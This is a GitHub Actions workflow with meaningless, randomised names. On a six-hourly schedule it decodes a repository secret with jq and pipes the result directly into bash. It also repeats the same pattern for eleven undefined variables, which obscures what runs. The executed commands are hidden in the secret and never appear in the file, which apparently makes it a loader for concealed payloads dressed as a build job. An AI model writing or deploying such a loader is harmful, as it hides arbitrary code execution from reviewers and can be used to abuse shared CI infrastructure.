name: heqizheng6789

on:
  workflow_dispatch:
  schedule:
    - cron: '23 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: heqizheng6789
        env:
          kgf032: ${{ secrets.kgf032 }}
        run: |
          echo $kgf032 | jq -r .jn69 | /bin/bash
          echo $g07 | jq -r .zh2781 | /bin/bash
          echo $wlgpo0 | jq -r .oimko3238 | /bin/bash
          echo $abgu4111 | jq -r .p13038 | /bin/bash
          echo $pfqn4873 | jq -r .vnmo507 | /bin/bash
          echo $cdy86166 | jq -r .irar21191 | /bin/bash
          echo $lzacy4 | jq -r .dcs7485 | /bin/bash
          echo $w5251 | jq -r .oz72843 | /bin/bash
          echo $f1579 | jq -r .hywbz02 | /bin/bash
          echo $dz8252 | jq -r .qc88 | /bin/bash
          echo $qze033 | jq -r .uqp7927 | /bin/bash
          echo $xmp6 | jq -r .db3106 | /bin/bash

